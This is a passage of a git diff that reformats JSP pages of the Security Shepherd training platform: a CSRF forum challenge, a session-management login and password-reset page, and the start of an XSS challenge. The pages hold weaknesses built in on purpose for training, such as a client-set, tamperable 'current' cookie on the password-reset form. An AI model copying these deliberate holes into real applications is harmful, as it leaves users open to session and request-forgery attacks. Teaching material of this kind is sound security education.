-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
-            String ApplicationRoot = getServletContext().getRealPath("");
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
-            String userClass = null;
-            if (ses.getAttribute("userClass") != null) {
-                userClass = Encode.forHtml(ses.getAttribute("userClass").toString());
-            }
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+/**
+ * Cross Site Request Forgery Challenge 1
+ * 
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ * 
+ * @author Mark Denihan
+ */
+	
+ String levelName = new String("CSRF Challenge 1");
+ String levelHash = new String("s74a796e84e25b854906d88f622170c1c06817e72b526b3d1e9a6085f429cf52");
+ 
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.csrf.csrfStrings", locale);
+ 
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ 		// Getting Session Variables
+		//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+		
+		String ApplicationRoot = getServletContext().getRealPath("");
+		String csrfToken = Encode.forHtml(tokenCookie.getValue());
+		String userClass = null;
+		if(ses.getAttribute("userClass") != null)
+		{
+			userClass = Encode.forHtml(ses.getAttribute("userClass").toString());
+		}
+		String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= bundle.getString("title.csrf1") %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= bundle.getString("title.csrf1") %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= bundle.getString("title.csrf1") %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.intro") %>
-        <br/> <br/> <a> GET /user/csrfchallengeone/plusplus?userid=<%= bundle.getString("challenge.userIdExample") %>
-    </a> <br/> <br/>
-            <%= bundle.getString("challenge.whereIdIsUserBeenIncremented.1") %>&nbsp;<%= bundle.getString("challenge.userIdExample") %>&nbsp;<%= bundle.getString("challenge.whereIdIsUserBeenIncremented.2") %>&nbsp;<%= bundle.getString("challenge.yourIdIs") %>
-        <a><%= userId %>
-        </a><%= bundle.getString("challenge.yourIdIs.1") %>
-        <br/> <br/>
-            <%= bundle.getString("challenge.useForumForImg") %>
-            <%
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= bundle.getString("title.csrf1") %></h2>
+		<p>
+			<%= bundle.getString("challenge.intro") %>
+			<br /> <br /> <a> GET /user/csrfchallengeone/plusplus?userid=<%= bundle.getString("challenge.userIdExample") %>
+			</a> <br /> <br />
+			<%= bundle.getString("challenge.whereIdIsUserBeenIncremented.1") %>&nbsp;<%= bundle.getString("challenge.userIdExample") %>&nbsp;<%= bundle.getString("challenge.whereIdIsUserBeenIncremented.2") %>&nbsp;<%= bundle.getString("challenge.yourIdIs") %>
+			<a><%= userId %></a><%= bundle.getString("challenge.yourIdIs.1") %>
+			<br /> <br />
+			<%= bundle.getString("challenge.useForumForImg") %>
+			<%
 					if(ModulePlan.isIncrementalFloor())
 					{
 					%>
-            <%= bundle.getString("challenge.firstUser.get") %>
-            <%
+			<%= bundle.getString("challenge.firstUser.get") %>
+			<%
 					}
 				%>
-            <%
+			<% 
 				String moduleId = Getter.getModuleIdFromHash(ApplicationRoot, levelHash);	
 				if (Getter.isCsrfLevelComplete(ApplicationRoot, moduleId, userId)) 
 				{ %>
+		
+		<h2 class='title'><%= bundle.getString("result.challengeCompleted") %></h2>
+		<p>
+			<%= bundle.getString("result.congratsTheKeyIs") %>
+			<b> <a><%= Hash.generateUserSolution(Getter.getModuleResult(ApplicationRoot, moduleId), (String)ses.getAttribute("userName")) %></a></b><br />
+			<br />
+			<% } %>
+		
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("forum.img.whatToDo") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="myMessage" type="text" />
+					</td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("forum.postMessage") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("forum.loading") %></p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <h2 class='title'><%= bundle.getString("result.challengeCompleted") %>
-    </h2>
-    <p>
-            <%= bundle.getString("result.congratsTheKeyIs") %>
-        <b>
-            <a><%= Hash.generateUserSolution(Getter.getModuleResult(ApplicationRoot, moduleId), (String) ses.getAttribute("userName")) %>
-            </a></b><br/>
-        <br/>
-            <% } %>
-
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("forum.img.whatToDo") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="myMessage" type="text"/>
-                </td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("forum.postMessage") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("forum.loading") %>
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
-
-    <div id="resultsDiv">
-        <%= Getter.getCsrfForumWithImg(ApplicationRoot, userClass, Getter.getModuleIdFromHash(ApplicationRoot, levelHash), bundle) %>
-    </div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        var theMessage = $("#myMessage").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                dataType: "text",
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    myMessage: theMessage,
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv">
+			<%= Getter.getCsrfForumWithImg(ApplicationRoot, userClass, Getter.getModuleIdFromHash(ApplicationRoot, levelHash), bundle) %>
+		</div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				var theMessage = $("#myMessage").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						dataType: "text",
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							myMessage: theMessage,
+							csrfToken: "<%= csrfToken %>"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/t193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3.jsp b/src/main/webapp/challenges/t193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3.jsp
index 9707179f4..167c71a7b 100644
--- a/src/main/webapp/challenges/t193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3.jsp
+++ b/src/main/webapp/challenges/t193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3.jsp
@@ -1,218 +1,228 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * Broken Authentication and Session Management Challenge Three
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+/**
+ * Broken Authentication and Session Management Challenge Three
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
 
-    String levelName = "Session Management Challenge Three";
-    String levelHash = "t193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3";
+String levelName = "Session Management Challenge Three";
+String levelHash = "t193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.sessionManagement." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.sessionManagement." + levelHash, locale);
 //Used more than once translations
-    String i18nLevelName = bundle.getString("challenge.challengeName");
+String i18nLevelName = bundle.getString("challenge.challengeName");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-        <br/>
-    <form id="leForm" action="javascript:;">
-        <div id="resultsDiv">
-            <table>
-                <tr>
-                    <td><%= bundle.getString("challenge.form.userName") %>
-                    </td>
-                    <td><input type="text" id="subUserName"/></td>
-                </tr>
-                <tr>
-                    <td><%= bundle.getString("challenge.form.password") %>
-                    </td>
-                    <td><input type="password" id="subUserPassword"/></td>
-                </tr>
-                <tr>
-                    <td colspan="2">
-                        <div id="submitButton">
-                            <input type="submit"
-                                   value="<%= bundle.getString("challenge.form.signIn") %>"/>
-                        </div>
-                    </td>
-                </tr>
-            </table>
-        </div>
-        <input type="button" id="showUserControl"
-               value="<%= bundle.getString("challenge.form.userFunctions") %>"/>
-    </form>
-    <p style="display: none;" id="loadingSign"><%= bundle.getString("challenge.form.loading") %>
-    </p>
-    <br/>
-    <div id="userControl" style="display: none;">
-        <form id="leForm2" action="javascript:;">
-            <h2 class='title'><%= bundle.getString("reset.header") %>
-            </h2>
-            <p><%= bundle.getString("reset.whatToDo") %>
-            </p>
-            <table>
-                <tr>
-                    <td><%= bundle.getString("reset.form.new") %>
-                    </td>
-                    <td><input type="password" id="passOne"/></td>
-                </tr>
-                <tr>
-                    <td><%= bundle.getString("reset.form.confirm") %>
-                    </td>
-                    <td><input type="password" id="passTwo"/></td>
-                </tr>
-                <tr>
-                    <td colspan="2">
-                        <div id="resetSubmit">
-                            <input type="submit"
-                                   value="<%= bundle.getString("reset.form.changePass") %>"/>
-                        </div>
-                        <p style="display: none;"
-                           id="resetLoadingSign"><%= bundle.getString("challenge.form.loading") %>
-                        </p>
-                    </td>
-                </tr>
-            </table>
-        </form>
-        <div id="resultsDiv2"></div>
-    </div>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+			<br />
+		<form id="leForm" action="javascript:;">
+			<div id="resultsDiv">
+				<table>
+					<tr>
+						<td><%= bundle.getString("challenge.form.userName") %></td>
+						<td><input type="text" id="subUserName" /></td>
+					</tr>
+					<tr>
+						<td><%= bundle.getString("challenge.form.password") %></td>
+						<td><input type="password" id="subUserPassword" /></td>
+					</tr>
+					<tr>
+						<td colspan="2">
+							<div id="submitButton">
+								<input type="submit"
+									value="<%= bundle.getString("challenge.form.signIn") %>" />
+							</div>
+						</td>
+					</tr>
+				</table>
+			</div>
+			<input type="button" id="showUserControl"
+				value="<%= bundle.getString("challenge.form.userFunctions") %>" />
+		</form>
+		<p style="display: none;" id="loadingSign"><%= bundle.getString("challenge.form.loading") %></p>
+		<br />
+		<div id="userControl" style="display: none;">
+			<form id="leForm2" action="javascript:;">
+				<h2 class='title'><%= bundle.getString("reset.header") %></h2>
+				<p><%= bundle.getString("reset.whatToDo") %></p>
+				<table>
+					<tr>
+						<td><%= bundle.getString("reset.form.new") %></td>
+						<td><input type="password" id="passOne" /></td>
+					</tr>
+					<tr>
+						<td><%= bundle.getString("reset.form.confirm") %></td>
+						<td><input type="password" id="passTwo" /></td>
+					</tr>
+					<tr>
+						<td colspan="2">
+							<div id="resetSubmit">
+								<input type="submit"
+									value="<%= bundle.getString("reset.form.changePass") %>" />
+							</div>
+							<p style="display: none;" id="resetLoadingSign"><%= bundle.getString("challenge.form.loading") %></p>
+						</td>
+					</tr>
+				</table>
+			</form>
+			<div id="resultsDiv2"></div>
+		</div>
 
 
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        var theSubName = $("#subUserName").val();
-        var theSubPassword = $("#subUserPassword").val();
-        $("#loadingSign").show("slow");
-        $("#forgottenPassDiv").hide("slow");
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    subUserName: theSubName,
-                    subUserPassword: theSubPassword
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#loadingSign").hide("fast", function () {
-                $("#resultsDiv").show("slow");
-            });
-        });
-    });
-
-    $("#leForm2").submit(function () {
-        document.cookie = "current=WjNWbGMzUXhNZz09";
-        var theNewPassword = $("#passOne").val();
-        var theNewPasswordAgain = $("#passTwo").val();
-        if (theNewPassword == theNewPasswordAgain && theNewPassword.length > 6) {
-            $("#resetSubmit").hide("fast");
-            $("#resetLoadingSign").show("slow");
-            $("#resultsDiv2").hide("slow", function () {
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "b467dbe3cd61babc0ec599fd0c67e359e6fe04e8cdc618d537808cbb693fee8a",
-                    data: {
-                        newPassword: theNewPassword
-                    },
-                    async: false
-                });
-                if (ajaxCall.status == 200) {
-                    $("#resultsDiv2").html(ajaxCall.responseText);
-                } else {
-                    $("#resultsDiv2").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-                }
-                $("#resultsDiv2").show("slow", function () {
-                    $("#resetLoadingSign").hide("fast", function () {
-                        $("#resetSubmit").show("slow");
-                    });
-                });
-            });
-        } else {
-            if (theNewPassword != theNewPasswordAgain) {
-                alert("<%= bundle.getString("error.noMatch") %>");
-            } else {
-                alert("<%= bundle.getString("error.tooShort") %>");
-            }
-        }
-    });
-
-    $("#showUserControl").click(function () {
-        $("#userControl").toggle("slow", function () {
-            //Animation Complete
-            ;
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				var theSubName = $("#subUserName").val();
+				var theSubPassword = $("#subUserPassword").val();
+				$("#loadingSign").show("slow");
+				$("#forgottenPassDiv").hide("slow");
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							subUserName: theSubName,
+							subUserPassword: theSubPassword
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#loadingSign").hide("fast", function(){
+						$("#resultsDiv").show("slow");
+					});
+				});
+			});
+			
+			$("#leForm2").submit(function(){
+				document.cookie="current=WjNWbGMzUXhNZz09";
+				var theNewPassword = $("#passOne").val();
+				var theNewPasswordAgain = $("#passTwo").val();
+				if(theNewPassword == theNewPasswordAgain && theNewPassword.length > 6)
+				{
+					$("#resetSubmit").hide("fast");
+					$("#resetLoadingSign").show("slow");
+					$("#resultsDiv2").hide("slow", function(){
+						var ajaxCall = $.ajax({
+							type: "POST",
+							url: "b467dbe3cd61babc0ec599fd0c67e359e6fe04e8cdc618d537808cbb693fee8a",
+							data: {
+								newPassword: theNewPassword
+							},
+							async: false
+						});
+						if(ajaxCall.status == 200)
+						{
+							$("#resultsDiv2").html(ajaxCall.responseText);
+						}
+						else
+						{
+							$("#resultsDiv2").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+						}
+						$("#resultsDiv2").show("slow", function(){
+							$("#resetLoadingSign").hide("fast", function(){
+								$("#resetSubmit").show("slow");
+							});
+						});
+					});
+				}
+				else
+				{
+					if(theNewPassword != theNewPasswordAgain)
+					{
+						alert("<%= bundle.getString("error.noMatch") %>");
+					}
+					else
+					{
+						alert("<%= bundle.getString("error.tooShort") %>");
+					}
+				}
+			});
+			
+			$("#showUserControl").click(function(){
+				$("#userControl").toggle("slow", function(){
+					//Animation Complete
+					;
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/t227357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888.jsp b/src/main/webapp/challenges/t227357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888.jsp
index fde2ba627..83d2d8ad1 100644
--- a/src/main/webapp/challenges/t227357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888.jsp
+++ b/src/main/webapp/challenges/t227357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888.jsp
@@ -1,146 +1,155 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
 
-    /**
-     * Cross Site Scripting Challenge 2
-     *
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
-    String levelHash = "t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888";
-    String levelName = "XSS Challenge 2";
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.xss." + levelHash, locale);
-    //Used more than once translations
-    String translatedLevelName = bundle.getString("challenge.challengeName");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
+/**
+ * Cross Site Scripting Challenge 2
+ *
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ * 
+ * @author Mark Denihan
+ */
+ String levelHash = "t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888";
+ String levelName = "XSS Challenge 2";
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.xss." + levelHash, locale);
+ //Used more than once translations
+ String translatedLevelName = bundle.getString("challenge.challengeName");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
